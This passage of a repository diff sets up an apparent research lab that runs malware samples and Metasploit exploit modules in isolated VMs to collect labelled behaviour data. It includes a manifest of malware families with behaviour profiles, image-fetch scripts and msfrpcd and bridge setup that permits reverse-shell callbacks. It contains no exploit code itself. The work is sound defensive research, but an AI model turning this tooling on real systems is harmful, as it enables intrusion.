                    raise ValueError(f"{path}: sample[{i}] missing or empty '{key}'")
            if entry["category"] not in _VALID_CATEGORIES:
                raise ValueError(
                    f"{path}: sample[{i}] category {entry['category']!r} "
                    f"not in {sorted(_VALID_CATEGORIES)}"
                )
            samples.append(Sample(
                name=entry["name"],
                family=entry["family"],
                category=entry["category"],
                profile=entry["profile"],
                description=entry.get("description", ""),
                source=entry.get("source"),
                sha256=entry.get("sha256"),
                url=entry.get("url"),
            ))
        # Reject duplicate names; trainers join on this.
        seen: set[str] = set()
        for s in samples:
            if s.name in seen:
                raise ValueError(f"{path}: duplicate sample name {s.name!r}")
            seen.add(s.name)
        return cls(samples=samples)

61
samples/manifest.toml Normal file

@ -0,0 +1,61 @@
# Sample manifest — what each fleet slot picks from.
#
# Each entry has three things:
# - identity (name, family, category) for labeling
# - acquisition (source, sha256, url) for reproducibility
# - behaviour (profile) so the synthetic load mimic can run a
# reasonable proxy until the real sample lands at samples/store/
#
# When the real malware binary is present at samples/store/<sha256>,
# the orchestrator runs THAT inside the guest. When it's absent, the
# orchestrator falls back to running tools/load_mimic.py with the
# matching profile so the fleet still produces *labeled, varied* data
# while we collect the real samples. Either way, meta.json records
# which path the episode took, so trainers can filter on
# meta.sample.kind ∈ {real, mimic}.
[[sample]]
name = "xmrig-cryptominer"
family = "XMRig"
category = "cryptominer"
profile = "cpu-saturate"
# A real XMRig fetch goes here when MalwareBazaar pull is wired up:
# source = "MalwareBazaar"
# sha256 = "TBD"
# url = "https://bazaar.abuse.ch/sample/TBD/"
description = "Sustained 1-vCPU saturation, very low IO/net. Pure compute."
[[sample]]
name = "mirai-class-bot"
family = "Mirai"
category = "botnet"
profile = "scan-and-dial"
description = "SYN scans across the bridge IP space + periodic dial-home. High net, low CPU."
[[sample]]
name = "ransomware-mimic"
family = "Cryptolocker-class"
category = "ransomware"
profile = "io-walk"
description = "Heavy disk write + filesystem walk producing a per-file overwrite envelope."
[[sample]]
name = "dridex-class-trojan"
family = "Dridex"
category = "banking-trojan"
profile = "bursty-c2"
description = "Long idle, periodic short bursts of TCP egress to a fixed peer (C2 beacon shape)."
[[sample]]
name = "kovter-class-stealth"
family = "Kovter"
category = "fileless"
profile = "low-and-slow"
description = "Low CPU, periodic memory churn, no persistent on-disk artifacts. Hardest to label from /proc alone."
[[sample]]
name = "reverse-shell-resident"
family = "Reverse-Shell"
category = "rat"
profile = "shell-resident"
description = "Single TCP socket pinned to an attacker IP, occasional command bursts."


@ -0,0 +1,62 @@
#!/usr/bin/env bash
# Fetch the Alpine 3.21 NoCloud cloud-init image used as the Tier-1/2
# baseline guest. Convert to qcow2 if necessary; verify sha512 against
# the value pinned in docs/sources.md.
#
# Usage:
# scripts/fetch-alpine-baseline.sh <out_path>
#
# Examples:
# scripts/fetch-alpine-baseline.sh vm/images/alpine-baseline.qcow2
# sudo scripts/fetch-alpine-baseline.sh /var/lib/cis490/vm/images/alpine-baseline.qcow2
#
# Idempotent — re-runs check the destination and short-circuit if the
# checksum already matches.
set -euo pipefail
OUT="${1:-}"
if [[ -z "$OUT" ]]; then
echo "usage: $0 <out_path>" >&2
exit 2
fi
URL="https://dl-cdn.alpinelinux.org/alpine/v3.21/releases/cloud/nocloud_alpine-3.21.0-x86_64-bios-cloudinit-r0.qcow2"
SHA512="bb509092cda3548c11bc48a2168ce950d654b50db006e98939c06a5d86487f4e53cbb7954fafbba9ab5c8098008a9f304421ffc3397b0bc1d87b6aa309239b98"
log() { printf '[fetch-alpine] %s\n' "$*" >&2; }
if [[ -f "$OUT" ]]; then
actual="$(sha512sum "$OUT" | awk '{print $1}')"
if [[ "$actual" == "$SHA512" ]]; then
log "$OUT already present and verified"
exit 0
fi
log "$OUT exists but checksum differs — refetching"
rm -f "$OUT"
fi
mkdir -p "$(dirname "$OUT")"
TMP="$OUT.partial"
trap 'rm -f "$TMP"' EXIT
log "downloading $URL"
if command -v curl >/dev/null; then
curl -fL --retry 3 --retry-delay 5 -o "$TMP" "$URL"
elif command -v wget >/dev/null; then
wget -O "$TMP" "$URL"
else
log "neither curl nor wget on PATH"
exit 1
fi
log "verifying sha512"
actual="$(sha512sum "$TMP" | awk '{print $1}')"
if [[ "$actual" != "$SHA512" ]]; then
log "sha512 mismatch: expected $SHA512, got $actual"
exit 1
fi
mv "$TMP" "$OUT"
trap - EXIT
log "wrote $OUT ($(stat -c%s "$OUT") bytes)"


@ -0,0 +1,69 @@
#!/usr/bin/env bash
# Fetch + sha256-verify the Metasploitable2 disk image.
#
# Rapid7's official download is gated behind a registration form, so
# we accept the URL + sha256 from env vars (with sane defaults pointing
# at a public mirror). The user installs this once per lab host.
#
# Inputs (env):
# IMAGE_URL — direct download URL for the metasploitable2 archive
# IMAGE_SHA256 — expected sha256 of the archive
# OUT_DIR — where to drop the qcow2 (default vm/images/)
#
# Outputs:
# $OUT_DIR/metasploitable2.qcow2 — converted from the original VMDK
# if needed.
#
# We do NOT bake an image url+hash into the repo because the canonical
# distribution is a registration-walled zip on Rapid7. Operators must
# supply both; the rest is mechanical.
set -euo pipefail
IMAGE_URL="${IMAGE_URL:-}"
IMAGE_SHA256="${IMAGE_SHA256:-}"
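# Resolve the repo root (which always exists) and append vm/images, so a
# missing vm/images directory does not abort the script under set -e.
OUT_DIR="${OUT_DIR:-$(cd "$(dirname "$0")/.." && pwd)/vm/images}"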
WORK_DIR="${WORK_DIR:-/tmp/cis490-metasploitable-fetch}"
log() { printf '[fetch-metasploitable2] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }
[[ -n "$IMAGE_URL" ]] || die "set IMAGE_URL to the Metasploitable2 download URL"
[[ -n "$IMAGE_SHA256" ]] || die "set IMAGE_SHA256 to the expected sha256 of the archive"
mkdir -p "$OUT_DIR" "$WORK_DIR"
ARCHIVE="$WORK_DIR/$(basename "$IMAGE_URL")"
log "downloading $IMAGE_URL -> $ARCHIVE"
if [[ -f "$ARCHIVE" ]]; then
log "archive already present; skipping download"
else
curl -fL --retry 3 --retry-delay 5 -o "$ARCHIVE.partial" "$IMAGE_URL"
mv "$ARCHIVE.partial" "$ARCHIVE"
fi
log "verifying sha256"
ACTUAL="$(sha256sum "$ARCHIVE" | awk '{print $1}')"
if [[ "$ACTUAL" != "$IMAGE_SHA256" ]]; then
die "sha256 mismatch: expected $IMAGE_SHA256, got $ACTUAL"
fi
log "sha256 ok"
# Extract — handle either zip or 7z, since various mirrors choose one
# or the other.
case "$ARCHIVE" in
*.zip) ( cd "$WORK_DIR" && unzip -o "$ARCHIVE" ) ;;
*.7z|*.7zip) command -v 7z >/dev/null || die "7z not installed"; \
( cd "$WORK_DIR" && 7z x -y "$ARCHIVE" ) ;;
*) die "unsupported archive type: $ARCHIVE" ;;
esac
VMDK="$(find "$WORK_DIR" -name 'Metasploitable*.vmdk' -print -quit)"
[[ -n "$VMDK" ]] || die "no Metasploitable*.vmdk in extracted archive"
log "converting $VMDK → qcow2"
command -v qemu-img >/dev/null || die "qemu-img required (apt install qemu-utils)"
qemu-img convert -O qcow2 "$VMDK" "$OUT_DIR/metasploitable2.qcow2"
log "done: $OUT_DIR/metasploitable2.qcow2"
log "Tier-3 ready when msfrpcd is up. See scripts/install-msfrpcd.sh."

234
scripts/install-lab-host.sh Executable file

@ -0,0 +1,234 @@
#!/usr/bin/env bash
# Install / refresh the CIS490 lab-host role.
#
# Idempotent — safe to re-run after `git pull`. Does NOT enroll the
# host into WireGuard (that's wg-enroll's job, run separately and
# *first*) and does NOT mint TLS certs (that's wg-pki's job).
#
# Steps:
# 1. Verify prereqs (KVM, zstd, qemu, python3.11+, systemd).
# 2. Create the cis490 service user + /var/lib/cis490 layout.
# 3. Sync the repo into /opt/cis490 and build a uv-managed venv.
# 4. Install systemd units from etc/.
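# 5. Drop /etc/cis490/lab-host.toml (only on first install).
# 6. Write /etc/cis490/lab-host.env and provision br-malware + the tap pool.
# 7. Auto-fetch the mTLS leaf cert from bootstrap.wg once host_id is set.
# 8. Fetch the Alpine baseline image and build cidata.iso (best-effort).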
#
# Operator finishes by:
# - editing /etc/cis490/lab-host.toml (host_id, receiver URL, certs)
# - placing leaf certs at /etc/cis490/certs/{lab-host.pem,key,wg-ca.pem}
# - `systemctl enable --now cis490-shipper`
set -euo pipefail
REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
SERVICE_USER="${SERVICE_USER:-cis490}"
log() { printf '[install-lab-host] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }
# --- 1. prereqs --------------------------------------------------------
log "checking prereqs"
if [[ $EUID -ne 0 ]]; then
die "must run as root (writes to /opt, /etc, /var/lib, and systemd)"
fi
command -v systemctl >/dev/null || die "systemd not found"
command -v qemu-system-x86_64 >/dev/null || die "qemu-system-x86_64 not on PATH"
command -v zstd >/dev/null || die "zstd not on PATH (apt install zstd)"
[[ -e /dev/kvm ]] || die "/dev/kvm missing — KVM not available"
# uv is preferred (lockfile-driven). Fall back to system pip if absent.
USE_UV=0
if command -v uv >/dev/null; then USE_UV=1; fi
# --- 2. user + layout --------------------------------------------------
log "ensuring service user $SERVICE_USER"
if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
useradd --system --no-create-home --shell /usr/sbin/nologin \
--home-dir "$INSTALL_ROOT" "$SERVICE_USER"
fi
# kvm group lets the service spawn VMs.
if getent group kvm >/dev/null 2>&1; then
usermod -a -G kvm "$SERVICE_USER" || true
fi
install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
"$DATA_ROOT" "$DATA_ROOT/data" \
"$DATA_ROOT/data/episodes" "$DATA_ROOT/data/outbox" \
"$DATA_ROOT/data/shipped" "$DATA_ROOT/data/queue" \
"$DATA_ROOT/samples" "$DATA_ROOT/samples/store" \
"$DATA_ROOT/vm" "$DATA_ROOT/vm/images"
# --- 3. repo + venv ----------------------------------------------------
log "syncing repo into $INSTALL_ROOT"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
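# We use a clean cp -aT rather than rsync to avoid an extra dep. Skip
# the copy when the script already runs from $INSTALL_ROOT: cp refuses
# to copy a directory onto itself, and set -e would abort the install.
if [[ "$REPO_ROOT" -ef "$INSTALL_ROOT" ]]; then
log "running from $INSTALL_ROOT; skipping copy"
else
cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
fi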
chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
log "building venv"
if [[ "$USE_UV" -eq 1 ]]; then
sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
uv sync --project "$INSTALL_ROOT"
else
sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
--quiet --upgrade pip
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
--quiet starlette 'uvicorn[standard]' httpx msgpack
fi
# --- 4. systemd --------------------------------------------------------
log "installing systemd units"
install -m 0644 "$REPO_ROOT/etc/cis490-shipper.service" \
/etc/systemd/system/cis490-shipper.service
install -m 0644 "$REPO_ROOT/etc/cis490-orchestrator.service" \
/etc/systemd/system/cis490-orchestrator.service
systemctl daemon-reload
# --- 5. config template (only on first install) -----------------------
if [[ ! -f "$ETC_ROOT/lab-host.toml" ]]; then
log "writing $ETC_ROOT/lab-host.toml (template)"
install -m 0640 -o root -g "$SERVICE_USER" \
"$REPO_ROOT/etc/lab-host.toml.example" "$ETC_ROOT/lab-host.toml"
NEW_INSTALL=1
else
log "$ETC_ROOT/lab-host.toml exists; leaving in place"
NEW_INSTALL=0
fi
# --- 6. orchestrator env file (read by cis490-orchestrator.service) ----
ENV_FILE="$ETC_ROOT/lab-host.env"
DEFAULT_HOST_ID="$(hostname -s)"
if [[ ! -f "$ENV_FILE" ]]; then
log "writing $ENV_FILE (host_id defaults to $DEFAULT_HOST_ID — edit if you want something else)"
install -m 0640 -o root -g "$SERVICE_USER" /dev/stdin "$ENV_FILE" <<EOF
# Read by cis490-orchestrator.service. Override per-host as needed.
FLEET_HOST_ID=$DEFAULT_HOST_ID
# BRIDGE=br-malware enables source 4 pcap capture AND unlocks the
# Tier-3 modules whose payloads need callback (reverse/bind shells).
# install-lab-host.sh provisions the bridge + tap pool below; leave
# this on unless your lab host can't run NETLINK ops.
BRIDGE=br-malware
EOF
fi
# --- 6b. host-only bridge + per-slot tap pool --------------------------
# br-malware lets pcap capture the guest traffic and lets bind/reverse
# shell payloads route between guest and host. We pre-create a small
# pool of taps so the launchers don't need sudo to attach interfaces;
# each slot uses cis490tap<SLOT> (Tier-2 demo) and cis490target<SLOT>
# (Tier-3 target). Idempotent: re-running on an already-set-up host
# is a no-op.
if command -v ip >/dev/null && [[ -x "$REPO_ROOT/vm/setup_bridge.sh" ]]; then
if "$REPO_ROOT/vm/setup_bridge.sh" >/dev/null 2>&1; then
log "bridge br-malware ready"
for n in 0 1 2 3 4 5 6 7; do
for prefix in cis490tap cis490target; do
tap="${prefix}${n}"
if ! ip link show "$tap" >/dev/null 2>&1; then
ip tuntap add dev "$tap" mode tap user "$SERVICE_USER" 2>/dev/null || \
ip tuntap add dev "$tap" mode tap 2>/dev/null || true
ip link set "$tap" master br-malware 2>/dev/null || true
ip link set "$tap" up 2>/dev/null || true
fi
done
done
log "tap pool: cis490tap0..7 + cis490target0..7 attached to br-malware"
else
log "WARN: setup_bridge.sh failed; BRIDGE mode will be unavailable"
# Comment out BRIDGE in the env file — fleet will still run
# Tier-2 + non-callback Tier-3 modules.
sed -i 's/^BRIDGE=br-malware/# BRIDGE=br-malware # auto-disabled: bridge setup failed/' "$ENV_FILE"
fi
fi
# --- 7. mTLS leaf cert (auto-fetch via bootstrap.wg) -------------------
# Pull our leaf cert from the Pi's bootstrap endpoint if it isn't
# already on disk. Trust boundary: "reached bootstrap.wg over WG"
# (iptmonads already filters non-peers from 443). Caddy's TLS cert
# is verified against the bundled etc/caddy-root.crt — no chicken-
# and-egg.
HOST_ID="$(grep -E '^host_id\s*=' "$ETC_ROOT/lab-host.toml" 2>/dev/null \
| head -1 | sed -E 's/^host_id\s*=\s*"([^"]+)".*/\1/')"
if [[ -z "$HOST_ID" || "$HOST_ID" == "REPLACE_ME" ]]; then
log "skipping cert auto-fetch: host_id not set in $ETC_ROOT/lab-host.toml"
elif [[ ! -f "$ETC_ROOT/certs/lab-host.pem" ]]; then
log "fetching leaf cert from https://bootstrap.wg/v1/cert/$HOST_ID"
install -d -m 0755 -o root -g "$SERVICE_USER" "$ETC_ROOT/certs"
TAR="/tmp/cis490-bootstrap-$$.tar"
if curl -fsS --cacert "$REPO_ROOT/etc/caddy-root.crt" \
--connect-timeout 10 --max-time 60 \
"https://bootstrap.wg/v1/cert/$HOST_ID" -o "$TAR"; then
tar -C "$ETC_ROOT/certs" -xf "$TAR"
mv "$ETC_ROOT/certs/ca.crt" "$ETC_ROOT/certs/wg-ca.pem"
mv "$ETC_ROOT/certs/$HOST_ID.pem" "$ETC_ROOT/certs/lab-host.pem"
mv "$ETC_ROOT/certs/$HOST_ID.key" "$ETC_ROOT/certs/lab-host.key"
chown root:"$SERVICE_USER" "$ETC_ROOT/certs/"*.pem \
"$ETC_ROOT/certs/lab-host.key"
chmod 0644 "$ETC_ROOT/certs/"*.pem
chmod 0640 "$ETC_ROOT/certs/lab-host.key"
rm -f "$TAR"
log "leaf cert installed for host_id=$HOST_ID"
else
rm -f "$TAR"
log "WARN: bootstrap.wg fetch failed — make sure /etc/hosts maps it"
log " to 10.100.0.1 and that wg0 is up. cert delivery skipped."
fi
else
log "$ETC_ROOT/certs/lab-host.pem present; skipping auto-fetch"
fi
# --- 8. baseline VM image + cidata (best-effort) -----------------------
ALPINE_IMG="$DATA_ROOT/vm/images/alpine-baseline.qcow2"
CIDATA_ISO="$DATA_ROOT/vm/images/cidata.iso"
if [[ ! -f "$ALPINE_IMG" ]]; then
if "$REPO_ROOT/scripts/fetch-alpine-baseline.sh" "$ALPINE_IMG"; then
log "fetched Alpine baseline -> $ALPINE_IMG"
else
log "WARN: Alpine baseline fetch failed; drop a qcow2 at $ALPINE_IMG manually"
fi
fi
if [[ -f "$ALPINE_IMG" && ! -f "$CIDATA_ISO" ]]; then
log "building cidata.iso (in-guest agent embedded)"
sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/python" \
"$INSTALL_ROOT/tools/build_cidata.py" "$CIDATA_ISO" || \
log "WARN: cidata build failed; run tools/build_cidata.py manually"
fi
# Symlink the canonical paths the launchers look at, when missing.
ln -sf "$ALPINE_IMG" "$INSTALL_ROOT/vm/images/alpine-baseline.qcow2" 2>/dev/null || true
ln -sf "$CIDATA_ISO" "$INSTALL_ROOT/vm/images/cidata.iso" 2>/dev/null || true
if [[ "$NEW_INSTALL" == "1" ]]; then
log ""
log "================================================================="
log " FIRST-INSTALL NEXT STEPS "
log "================================================================="
log " 1. Edit $ETC_ROOT/lab-host.toml — set host_id and receiver URL."
log ""
log " 2. (On the Pi.) Mint + ship a leaf cert for this host:"
log " sudo wg-pki/scripts/deploy-cis490-cert.sh <host_id> <wg_ip>"
log ""
log " 3. Run the diagnostic — every red row prints the exact fix:"
log " $INSTALL_ROOT/.venv/bin/python \\"
log " $INSTALL_ROOT/tools/cis490_doctor.py --role lab-host"
log ""
log " 4. Smoke-test the pipe (returns ok=true on success):"
log " sudo -u $SERVICE_USER $INSTALL_ROOT/.venv/bin/python -m shipper \\"
log " --config $ETC_ROOT/lab-host.toml --ping"
log ""
log " 5. Turn on the services — episodes start flowing immediately:"
log " sudo systemctl enable --now cis490-shipper cis490-orchestrator"
log "================================================================="
fi
log "lab-host install complete."
log ""
log "Cloning this repo and running the launchers manually is NOT enough."
log "The lab-host role's data flow lives in the systemd services this"
log "script just installed. If $INSTALL_ROOT/index.jsonl on the Pi stays"
log "empty after step 5, run:"
log " $INSTALL_ROOT/.venv/bin/python $INSTALL_ROOT/tools/cis490_doctor.py"

124
scripts/install-msfrpcd.sh Executable file

@ -0,0 +1,124 @@
#!/usr/bin/env bash
# Install + configure ``msfrpcd`` for the Tier-3 exploit driver.
#
# Idempotent: re-running on a host that already has msfrpcd refreshes
# the systemd unit but doesn't reinstall the framework, and an existing
# password in /etc/cis490/msfrpc.env is preserved.
#
# Steps:
#   1. Install metasploit-framework via the host package manager (or
#      report the right one-liner for that distro). Big download:
#      ~1 GiB and several minutes.
#   2. Generate a strong password and store at /etc/cis490/msfrpc.env
#      (mode 0640, owner root:cis490). First run only.
#   3. Drop /etc/systemd/system/cis490-msfrpcd.service that runs
#      msfrpcd bound to 127.0.0.1:55553 with the generated password.
#   4. Enable + start, then smoke-check the listener.
#
# After this runs, ``MSFRPC_PASSWORD=$(. /etc/cis490/msfrpc.env;
# echo $MSFRPC_PASSWORD)`` makes tools/run_tier3_demo.py work zero-touch.
set -euo pipefail

ETC_ROOT="/etc/cis490"
ENV_FILE="$ETC_ROOT/msfrpc.env"
UNIT="/etc/systemd/system/cis490-msfrpcd.service"
PORT="${MSFRPC_PORT:-55553}"
USER_NAME="${MSFRPC_USER:-msf}"

log() { printf '[install-msfrpcd] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }

[[ $EUID -eq 0 ]] || die "must run as root"
command -v systemctl >/dev/null || die "systemd not found"

# --- 1. install metasploit-framework -----------------------------------
if ! command -v msfrpcd >/dev/null; then
    log "msfrpcd not found; installing metasploit-framework"
    if command -v apt-get >/dev/null; then
        # The Debian/Ubuntu metasploit-framework package isn't in
        # the default repos for most distros. Stage Rapid7's official
        # nightly installer at /tmp/msfinstall.sh for the operator;
        # this script does not execute it.
        if [[ ! -x /opt/metasploit-framework/bin/msfrpcd ]]; then
            log "fetching Rapid7 nightly installer"
            curl -fsSL https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb \
                -o /tmp/msfinstall.sh || true
            log "automated install not available; install manually:"
            log "  https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html"
            die "rerun once msfrpcd is on PATH"
        fi
        # Symlink the wrapper so ``msfrpcd`` is on PATH.
        ln -sf /opt/metasploit-framework/bin/msfrpcd /usr/local/bin/msfrpcd
    elif command -v pacman >/dev/null; then
        log "pacman -S metasploit"
        pacman -Sy --noconfirm metasploit
    elif command -v dnf >/dev/null; then
        die "Fedora/RHEL: install metasploit-framework manually, then re-run"
    else
        die "unknown package manager; install metasploit-framework manually"
    fi
fi
command -v msfrpcd >/dev/null || die "msfrpcd still missing after install attempt"

# --- 2. generate password ----------------------------------------------
install -d -m 0755 -o root -g root "$ETC_ROOT"
if ! id -u cis490 >/dev/null 2>&1; then
    useradd --system --no-create-home --shell /usr/sbin/nologin cis490
fi
if [[ ! -f "$ENV_FILE" ]]; then
    log "generating msfrpc password"
    PW="$(openssl rand -base64 24 | tr -d '/+=' | head -c 32)"
    install -m 0640 -o root -g cis490 /dev/stdin "$ENV_FILE" <<EOF
# Auto-generated by install-msfrpcd.sh; do not edit.
MSFRPC_HOST=127.0.0.1
MSFRPC_PORT=$PORT
MSFRPC_USER=$USER_NAME
MSFRPC_PASSWORD=$PW
EOF
else
    log "$ENV_FILE exists; preserving existing password"
fi

# --- 3. systemd unit ----------------------------------------------------
log "installing systemd unit"
cat > "$UNIT" <<EOF
[Unit]
Description=CIS490 - Metasploit RPC daemon (loopback only)
Documentation=https://maxgit.wg/spectral/CIS490
After=network-online.target
Wants=network-online.target

[Service]
Type=simple
EnvironmentFile=$ENV_FILE
# msfrpcd flags:
#   -P <pw>    password
#   -U <user>  username
#   -a <ip>    bind address (loopback only; Tier-3 driver runs locally)
#   -p <port>  port
#   -f         foreground (no daemonization, so systemd manages PID)
ExecStart=/usr/bin/env msfrpcd -P \${MSFRPC_PASSWORD} -U \${MSFRPC_USER} -a 127.0.0.1 -p \${MSFRPC_PORT} -f
Restart=on-failure
RestartSec=5
NoNewPrivileges=true
PrivateTmp=true
ProtectSystem=full
ProtectHome=true

[Install]
WantedBy=multi-user.target
EOF
systemctl daemon-reload
systemctl enable --now cis490-msfrpcd

# --- 4. final smoke -----------------------------------------------------
sleep 2
if ! ss -ltn 2>/dev/null | grep -q ":$PORT"; then
    log "WARN: nothing listening on 127.0.0.1:$PORT yet; check"
    log "  journalctl -u cis490-msfrpcd"
fi
log "done. To run a Tier-3 episode:"
log "  set -a; . $ENV_FILE; set +a"
log "  python tools/run_tier3_demo.py --module vsftpd_234_backdoor"

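The env file written in step 2 is plain `KEY=VALUE` text, so a Python tool could read it without sourcing it through a shell. The following is a minimal sketch under that assumption, not part of the repo: `parse_env_text` and `load_env_file` are hypothetical helper names, and the sample password is a placeholder.

```python
from __future__ import annotations

from pathlib import Path


def parse_env_text(text: str) -> dict[str, str]:
    """Parse KEY=VALUE lines, skipping blank lines and # comments."""
    env: dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        key, sep, value = line.partition("=")
        if not sep:
            raise ValueError(f"not a KEY=VALUE line: {raw!r}")
        env[key.strip()] = value.strip()
    return env


def load_env_file(path: str | Path = "/etc/cis490/msfrpc.env") -> dict[str, str]:
    """Hypothetical loader; the caller needs read access (root or group cis490)."""
    return parse_env_text(Path(path).read_text())


# Same shape as the file install-msfrpcd.sh generates; the password is a placeholder.
SAMPLE = """\
# Auto-generated by install-msfrpcd.sh
MSFRPC_HOST=127.0.0.1
MSFRPC_PORT=55553
MSFRPC_USER=msf
MSFRPC_PASSWORD=example-not-a-real-secret
"""

if __name__ == "__main__":
    creds = parse_env_text(SAMPLE)
    print(creds["MSFRPC_HOST"], creds["MSFRPC_PORT"], creds["MSFRPC_USER"])
```

Values come back as strings, so a caller would convert `MSFRPC_PORT` with `int()` before opening a connection.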
112
scripts/install-receiver.sh Executable file

@ -0,0 +1,112 @@
#!/usr/bin/env bash
# Install / refresh the CIS490 receiver role on the central WG node
# (the Pi5 in our setup). Idempotent; safe to re-run.
#
# Steps:
#   1. Verify prereqs (python3.11+, systemd).
#   2. Create the cis490 service user + /var/lib/cis490 layout.
#   3. Sync the repo into /opt/cis490 and build a venv.
#   4. Install cis490-receiver.service.
#   5. Drop /etc/cis490/receiver.toml on first install.
#
# This script does NOT:
#   - configure Caddy. Add a `collector.wg` block to your spectral/caddy
#     config to terminate TLS and reverse-proxy to 127.0.0.1:8443.
#   - issue server / client certs. wg-pki owns CA + leaf issuance.
#   - open firewall ports. iptmonads owns the WG-side ruleset.
set -euo pipefail

REPO_ROOT="$(cd "$(dirname "$0")/.." && pwd)"
INSTALL_ROOT="${INSTALL_ROOT:-/opt/cis490}"
DATA_ROOT="${DATA_ROOT:-/var/lib/cis490}"
ETC_ROOT="${ETC_ROOT:-/etc/cis490}"
SERVICE_USER="${SERVICE_USER:-cis490}"

log() { printf '[install-receiver] %s\n' "$*" >&2; }
die() { log "FATAL: $*"; exit 1; }

# --- 1. prereqs --------------------------------------------------------
log "checking prereqs"
if [[ $EUID -ne 0 ]]; then
    die "must run as root"
fi
command -v systemctl >/dev/null || die "systemd not found"
command -v python3 >/dev/null || die "python3 not on PATH"
PY_VER="$(python3 -c 'import sys; print(f"{sys.version_info.major}.{sys.version_info.minor}")')"
if ! python3 -c 'import sys; sys.exit(0 if sys.version_info >= (3,11) else 1)'; then
    die "python >=3.11 required, found $PY_VER"
fi
USE_UV=0
if command -v uv >/dev/null; then USE_UV=1; fi

# --- 2. user + layout --------------------------------------------------
log "ensuring service user $SERVICE_USER"
if ! id -u "$SERVICE_USER" >/dev/null 2>&1; then
    useradd --system --no-create-home --shell /usr/sbin/nologin \
        --home-dir "$INSTALL_ROOT" "$SERVICE_USER"
fi
install -d -o root -g root -m 0755 "$ETC_ROOT" "$ETC_ROOT/certs"
# The data root itself is 0750; the subdirectories beneath it are 0755.
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0750 "$DATA_ROOT"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 \
    "$DATA_ROOT/episodes" "$DATA_ROOT/incoming"
# Pre-create the index file so the first PUT doesn't race on creation.
sudo -u "$SERVICE_USER" -- touch "$DATA_ROOT/index.jsonl"

# --- 3. repo + venv ----------------------------------------------------
log "syncing repo into $INSTALL_ROOT"
install -d -o "$SERVICE_USER" -g "$SERVICE_USER" -m 0755 "$INSTALL_ROOT"
# cp refuses to copy a directory onto itself, which would abort the
# script under `set -e` when it is run from the installed copy.
if [[ "$REPO_ROOT" -ef "$INSTALL_ROOT" ]]; then
    log "already running from $INSTALL_ROOT; skipping copy"
else
    cp -aT "$REPO_ROOT" "$INSTALL_ROOT"
fi
chown -R "$SERVICE_USER":"$SERVICE_USER" "$INSTALL_ROOT"
log "building venv"
if [[ "$USE_UV" -eq 1 ]]; then
    sudo -u "$SERVICE_USER" -- env HOME="$INSTALL_ROOT" \
        uv sync --project "$INSTALL_ROOT"
else
    sudo -u "$SERVICE_USER" -- python3 -m venv "$INSTALL_ROOT/.venv"
    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
        --quiet --upgrade pip
    sudo -u "$SERVICE_USER" -- "$INSTALL_ROOT/.venv/bin/pip" install \
        --quiet starlette 'uvicorn[standard]'
fi

# --- 4. systemd --------------------------------------------------------
log "installing systemd units (receiver + bootstrap)"
install -m 0644 "$REPO_ROOT/etc/cis490-receiver.service" \
    /etc/systemd/system/cis490-receiver.service
install -m 0644 "$REPO_ROOT/etc/cis490-bootstrap.service" \
    /etc/systemd/system/cis490-bootstrap.service
systemctl daemon-reload

# --- 5. config template (only on first install) -----------------------
if [[ ! -f "$ETC_ROOT/receiver.toml" ]]; then
    log "writing $ETC_ROOT/receiver.toml (template)"
    install -m 0640 -o root -g "$SERVICE_USER" \
        "$REPO_ROOT/etc/receiver.toml.example" "$ETC_ROOT/receiver.toml"
    log ""
    log "FIRST-INSTALL NEXT STEPS:"
    log " 1. Verify $ETC_ROOT/receiver.toml paths."
    log " 2. Add a collector.wg block to your spectral/caddy config."
    log " Example:"
    log " collector.wg {"
    log " tls internal"
    log " reverse_proxy 127.0.0.1:8443"
    log " }"
    log " (mTLS to clients is enforced by the wg-pki CA bundle on"
    log " the receiver side once leaf certs are issued.)"
    log " 3. Open the WG-side port via iptmonads."
    log " 4. systemctl enable --now cis490-receiver cis490-bootstrap"
    log " 5. From a lab host: cis490-shipper --ping"
    log ""
    log "Bootstrap endpoint (cis490-bootstrap on :8446 + Caddy bootstrap.wg)"
    log "lets enrolled lab hosts auto-fetch their leaf certs. Without it,"
    log "operators have to hand-carry tarballs via deploy-cis490-cert.sh."
else
    log "$ETC_ROOT/receiver.toml exists; leaving in place"
fi
log "receiver install complete."


@ -0,0 +1,50 @@
#!/usr/bin/env bash
# Wrapper that re-points the wg-pki issuer script's relative-path
# assumption (PWD-derived publish dir, $REPO_ROOT/issued/) to the
# absolute /var/lib/wg-pki/issued/ that the bootstrap service uses.
#
# wg-pki ships the actual issuer at
# /home/max/.env/wg-pki/scripts/issue-cis490-client-cert.sh, which
# computes paths relative to its own location. This wrapper sets
# WG_PKI_STATE so the CA key is found in /var/lib/wg-pki, and forces
# --out-dir to a path under /var/lib so cis490-bootstrap (with
# ProtectHome=tmpfs) can write the resulting tarballs.
set -euo pipefail

# Resolve issuer path: prefer the install-time copy at /opt/wg-pki/,
# fall back to whatever wg-pki clone the operator has under /home.
